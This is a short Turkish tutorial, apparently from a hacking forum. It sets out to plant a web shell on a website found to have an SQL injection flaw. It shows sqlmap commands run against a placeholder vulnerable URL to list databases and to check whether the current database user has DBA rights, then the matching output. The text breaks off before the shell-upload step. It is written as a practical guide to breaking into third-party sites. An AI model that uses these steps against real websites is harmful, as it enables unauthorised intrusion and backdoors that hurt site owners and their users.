<div>SelamınAleyküm Kolay Gelsin...

İlk başta bir sql açıklı site bulduk ve bu açıklı sitemize shell sokmak istiyoruz.Öncelikle sitemizde bir sqlmap
sorgusu yapıyoruz ancak farklı parametreleri kullanarak bu işlemi gerçekleştiriyoruz.

Bu sefer --dbs komutu yerine, --current-user --is-dba komutunu kullanacağız.Örnek ile gösterecek olursak;

Normalde bu kodu kullanıyorduk;

sqlmap -u "www.sqlaciklisite.com/php?id=" --dbs

Bu sefer bu kod yerine aşağıdaki kodu kullanacağız;

Kullanacağımız Kodumuz:

sqlmap -u "www..sqlörneksite.com/php?id=" --current-user --is-dba

komutu ile başlatabiliriz. Biraz bekledikten sonra eğer aşağıdaki gibi bir kod görürseniz;


Kodumuz:

<font color="cyan"><b>--> current user is DBA : True